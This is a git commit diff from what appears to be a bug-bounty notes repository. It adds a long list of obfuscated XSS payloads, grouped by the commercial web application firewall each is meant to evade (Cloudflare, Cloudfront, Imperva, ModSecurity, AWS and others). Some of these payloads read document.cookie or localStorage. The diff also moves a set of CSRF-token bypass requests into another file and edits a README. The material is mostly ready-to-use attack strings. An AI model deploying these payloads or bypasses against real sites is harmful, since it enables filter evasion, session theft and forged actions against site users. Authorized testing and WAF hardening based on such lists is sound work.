feat: added XSS payloads to bypass WAF
parent
5c6916174a
commit
4f51606813
|
@ -1,30 +0,0 @@
|
|||
# Bypass 304 (Not Modified)
|
||||
|
||||
1. Delete "If-None-Match" header
|
||||
```
|
||||
GET /admin HTTP/1.1
|
||||
Host: target.com
|
||||
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
GET /admin HTTP/1.1
|
||||
Host: target.com
|
||||
```
|
||||
|
||||
2. Adding random character in the end of "If-None-Match" header
|
||||
```
|
||||
GET /admin HTTP/1.1
|
||||
Host: target.com
|
||||
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
GET /admin HTTP/1.1
|
||||
Host: target.com
|
||||
Host: target.com
|
||||
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b
|
||||
```
|
||||
|
||||
## References
|
||||
* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521)
|
|
@ -1,120 +0,0 @@
|
|||
# Bypass CSRF
|
||||
|
||||
1. Change single character
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
|
||||
```
|
||||
|
||||
2. Sending empty value of token
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=
|
||||
```
|
||||
|
||||
3. Replace the token with same length
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaa
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaabaa
|
||||
```
|
||||
4. Changing POST / GET method
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
```
|
||||
|
||||
5. Remove the token from request
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456
|
||||
```
|
||||
|
||||
6. Use another user's valid token
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
|
||||
```
|
||||
|
||||
7. Try to decrypt hash
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=MTIzNDU2
|
||||
```
|
||||
MTIzNDU2 => 123456 with base64
|
||||
|
||||
8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=vi802jg9f8akd9j123
|
||||
```
|
||||
When we register again, the request like this
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=vi802jg9f8akd9j124
|
||||
```
|
||||
If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
|
|
@ -4,7 +4,7 @@
|
|||
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
|
||||
|
||||
## Where to find
|
||||
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
|
||||
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack.
|
||||
|
||||
## How to exploit
|
||||
1. HTML GET Method
|
||||
|
@ -93,3 +93,125 @@ xhr.send('{"role":admin}');
|
|||
<br>
|
||||
</body>
|
||||
```
|
||||
|
||||
# Bypass CSRF Token
|
||||
But in some cases, even though there is a CSRF token on the form on the website. CSRF tokens can still be bypassed by doing a few things:
|
||||
|
||||
1. Change single character
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
|
||||
```
|
||||
|
||||
2. Sending empty value of token
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=
|
||||
```
|
||||
|
||||
3. Replace the token with same length
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaa
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaabaa
|
||||
```
|
||||
4. Changing POST / GET method
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
```
|
||||
|
||||
5. Remove the token from request
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456
|
||||
```
|
||||
|
||||
6. Use another user's valid token
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
|
||||
```
|
||||
|
||||
7. Try to decrypt hash
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=MTIzNDU2
|
||||
```
|
||||
MTIzNDU2 => 123456 with base64
|
||||
|
||||
8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=vi802jg9f8akd9j123
|
||||
```
|
||||
When we register again, the request like this
|
||||
```
|
||||
POST /register HTTP/1.1
|
||||
Host: target.com
|
||||
...
|
||||
|
||||
username=dapos&password=123456&token=vi802jg9f8akd9j124
|
||||
```
|
||||
If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
|
||||
|
|
|
@ -344,31 +344,22 @@ javascript://%250Aalert(1)
|
|||
```
|
||||
<svg%0Aonauxclick=0;[1].some(confirm)//
|
||||
|
||||
<svg onload=alert%26%230000000040"")>
|
||||
<svg/onload={alert`1`}>
|
||||
|
||||
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
|
||||
<svg onx=() onload=(confirm)(1)>
|
||||
|
||||
<svg onx=() onload=(confirm)(document.cookie)>
|
||||
|
||||
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
|
||||
|
||||
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||
|
||||
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
|
||||
|
||||
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||
|
||||
"><onx=[] onmouseover=prompt(1)>
|
||||
|
||||
%2sscript%2ualert()%2s/script%2u -xss popup
|
||||
|
||||
<svg onload=alert%26%230000000040"1")>
|
||||
%2sscript%2ualert()%2s/script%2u
|
||||
|
||||
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
|
||||
|
||||
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
|
||||
|
||||
<svg onload=alert%26%230000000040"1")>
|
||||
|
||||
<svg onload=prompt%26%230000000040document.domain)>
|
||||
|
||||
<svg onload=prompt%26%23x000000028;document.domain)>
|
||||
|
@ -379,11 +370,84 @@ Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
|||
|
||||
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
|
||||
|
||||
<img ignored=() src=x onerror=prompt(1)>
|
||||
|
||||
<svg onx=() onload=(confirm)(1)>
|
||||
|
||||
<--`<img/src=` onerror=confirm``> --!>
|
||||
|
||||
<img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)">
|
||||
|
||||
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
|
||||
|
||||
'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
|
||||
|
||||
'"><img/src/onerror=.1|alert``>
|
||||
|
||||
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
|
||||
|
||||
<img ignored=() src=x onerror=prompt(1)>
|
||||
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||
```
|
||||
|
||||
2. Cloudfront
|
||||
```
|
||||
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
|
||||
|
||||
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
|
||||
|
||||
"><--<img+src= "><svg/onload+alert(document.domain)>> --!>
|
||||
```
|
||||
|
||||
3. Cloudbric
|
||||
```
|
||||
<a69/onclick=[1].findIndex(alert)>pew
|
||||
```
|
||||
|
||||
4. Comodo WAF
|
||||
```
|
||||
<input/oninput='new Function`confir\u006d\`0\``'>
|
||||
|
||||
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
|
||||
```
|
||||
|
||||
5. ModSecurity
|
||||
```
|
||||
<a href="jav%0Dascript:alert(1)">
|
||||
```
|
||||
|
||||
6. Imperva
|
||||
```
|
||||
<input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
|
||||
|
||||
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme
|
||||
|
||||
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
|
||||
|
||||
<a69/onclick=write()>pew
|
||||
|
||||
<details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>
|
||||
|
||||
<svg onload\r\n=$.globalEval("al"+"ert()");>
|
||||
|
||||
<svg/onload=self[`aler`%2b`t`]`1`>
|
||||
|
||||
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
|
||||
|
||||
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
|
||||
|
||||
<img/src=q onerror='new Function`al\ert\`1\``'>
|
||||
|
||||
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
||||
```
|
||||
|
||||
7. AWS
|
||||
```
|
||||
<script>eval(atob(decodeURIComponent(confirm`1`)))</script>
|
||||
```
|
||||
|
||||
If you want to see the other payload for other WAF, check this [link](https://github.com/0xInfection/Awesome-WAF)
|
||||
|
||||
## References
|
||||
- [Brute Logic](https://brutelogic.com.br/)
|
||||
- [Awesome-WAF](https://github.com/0xInfection/Awesome-WAF)
|
||||
- Some random twitter posts
|
10
README.md
10
README.md
|
@ -22,7 +22,9 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
|
||||
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
||||
- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
|
||||
- [Server Side Request Forgery](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Request%20Forgery.md)
|
||||
- SQL Injection (SOON)
|
||||
- [Web Cache Deception](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Deception.md)
|
||||
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
||||
|
||||
## Checklist
|
||||
|
@ -32,10 +34,8 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||
## List Bypass
|
||||
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
|
||||
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
|
||||
- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
|
||||
- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
|
||||
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
||||
- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
|
||||
|
||||
## Miscellaneous
|
||||
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
||||
|
@ -50,11 +50,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||
- [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
|
||||
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
|
||||
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
|
||||
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
||||
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
||||
- [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md)
|
||||
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
||||
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
||||
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
|
||||
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
||||
- [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
|
||||
- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md)
|
||||
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md)
|
||||
|
@ -69,5 +69,5 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||
- [ ] Tidy up the reconnaisance folder
|
||||
- [ ] Seperate the bypass from some vulnerability readme
|
||||
- [ ] Writes multiple payload bypasses for each vulnerability
|
||||
- [ ] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
|
||||
- [x] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
|
||||
- [ ] Payload SQL injection for each WAF (Cloudflare, Cloudfront)
|
Loading…
Reference in New Issue